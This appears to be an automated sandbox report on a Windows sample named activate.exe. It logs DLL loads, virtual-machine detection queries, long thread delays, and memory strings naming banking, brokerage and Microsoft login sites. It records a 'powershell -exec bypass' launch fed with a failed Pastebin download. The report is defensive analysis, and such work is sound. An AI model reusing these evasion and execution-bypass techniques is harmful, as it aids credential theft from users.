Source: activate.exe	String found in binary or memory: ../source/libilbc-git/signal_processing/filter_ar_fast_q12.cdata_length > 0coefficients_length > 1src/preprocess.cSO >= -0x4000SO <= 0x3FFCs1 != MIN_WORDsrc/lpc.csmax > 0scalauto <= 4temp >= 0 && temp < 32r >= 0r != MIN_WORDtemp >= 0src/long_term.cddpedppNcbcdmax > 0scal >= 0scal <= 100 && scal >= -100Nc <= 120 && Nc >= 40Nr >= 40 && Nr <= 120brp != MIN_WORDsrc/rpe.cexp >= -4 && exp <= 6mant >= 0 && mant <= 70 <= Mc && Mc <= 3xMc <= 7 && xMc >= 0temp <= 7 && temp >= -7exp <= 5exp <= 6 && exp >= 0temp <= 11 && temp >= 0exp <= 4096 && exp >= -4096temp1 >= 0 && temp1 < 16src/add.ca != MIN_WORD \|\| b != MIN_WORDa != 0num >= 0 && denum >= num

Source: C:\Users\user\Desktop\activate.exe

File read: C:\Users\user\Desktop\activate.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\activate.exe "C:\Users\user\Desktop\activate.exe"
Source: C:\Users\user\Desktop\activate.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\activate.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw	Jump to behavior

Source: C:\Users\user\Desktop\activate.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: quserex.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: activate.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: activate.exe

Static file information: File size 27667456 > 1048576

Source: activate.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x13cac00
Source: activate.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x600600

Source: activate.exe

Static PE information: More than 200 imports for msvcrt.dll

Source: activate.exe

Static PE information: section name: .rodata

Source: C:\Users\user\Desktop\activate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\activate.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\activate.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\activate.exe	Window / User API: threadDelayed 9555	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2308	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 499	Jump to behavior

Source: C:\Users\user\Desktop\activate.exe TID: 6220	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe TID: 1104	Thread sleep count: 9555 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1072	Thread sleep count: 2308 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1060	Thread sleep count: 499 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\activate.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\activate.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\activate.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: activate.exe, 00000000.00000003.1520257805.0000000006538000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: activate.exe, 00000000.00000003.1600844211.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1563568803.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1576398626.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1601158140.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215624710.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000002.3177826665.00000000029FA000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215907026.00000000029F8000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1577563370.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1563691895.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1500540779.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1576635382.00000000029F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: activate.exe	Binary or memory string: xvmcidct
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: activate.exe	Binary or memory string: d->log2_chroma_h <= 3d->nb_components <= 4d->name && d->name[0](d->nb_components==4 \|\| d->nb_components==2) == !!(d->flags & (1 << 7))!c->plane && !c->step_minus1 && !c->offset_plus1 && !c->shift && !c->depth_minus1c->step_minus1 >= c->depth_minus18*(c->step_minus1+1) >= c->depth_minus1+1bayer_tmp[0] == 0 && tmp[1] == 0beyuv420pyuyv422rgb24bgr24yuv422pyuv444pyuv410pyuv411pgraymonowmonobpal8yuvj420pyuvj422pyuvj444pxvmcmcxvmcidctuyvy422uyyvyy411bgr8bgr4bgr4_bytergb8rgb4rgb4_bytenv12nv21argbabgrgray16begray16leyuv440pyuvj440pyuva420pvdpau_h264vdpau_mpeg1vdpau_mpeg2vdpau_wmv3vdpau_vc1rgb48bergb48lergb565bergb565lergb555bergb555lebgr565bebgr565lebgr555bebgr555levaapi_mocovaapi_idctvaapi_vldyuv420p16leyuv420p16beyuv422p16leyuv422p16beyuv444p16leyuv444p16bevdpau_mpeg4dxva2_vldrgb444lergb444bebgr444lebgr444begray8abgr48bebgr48leyuv420p9beyuv420p9leyuv420p10beyuv420p10leyuv422p10beyuv422p10leyuv444p9beyuv444p9leyuv444p10beyuv444p10leyuv422p9beyuv422p9levda_vldgbrpgbrp9begbrp9legbrp10begbrp10legbrp16begbrp16leyuva420p9beyuva420p9leyuva422p9beyuva422p9leyuva444p9beyuva444p9leyuva420p10beyuva420p10leyuva422p10beyuva422p10leyuva444p10beyuva444p10leyuva420p16beyuva420p16leyuva422p16beyuva422p16leyuva444p16beyuva444p16levdpauxyz12lexyz12benv16nv20lenv20beyvyu422rgba64bergba64lebgra64bebgra64le0rgbrgb00bgrbgr0yuva444pyuva422pyuv420p12beyuv420p12leyuv420p14beyuv420p14leyuv422p12beyuv422p12leyuv422p14beyuv422p14leyuv444p12beyuv444p12leyuv444p14beyuv444p14legbrp12begbrp12legbrp14begbrp14legbrapgbrap16begbrap16leyuvj411pbayer_bggr8bayer_rggb8bayer_gbrg8bayer_grbg8bayer_bggr16lebayer_bggr16bebayer_rggb16lebayer_rggb16bebayer_gbrg16lebayer_gbrg16bebayer_grbg16lebayer_grbg16beO
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: activate.exe, 00000000.00000002.3177722701.00000000029BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: activate.exe	Binary or memory string: VMware Screen Codec / VMware Video
Source: activate.exe	Binary or memory string: BxvmncVMware Screen Codec / VMware Videointerlacing not supported
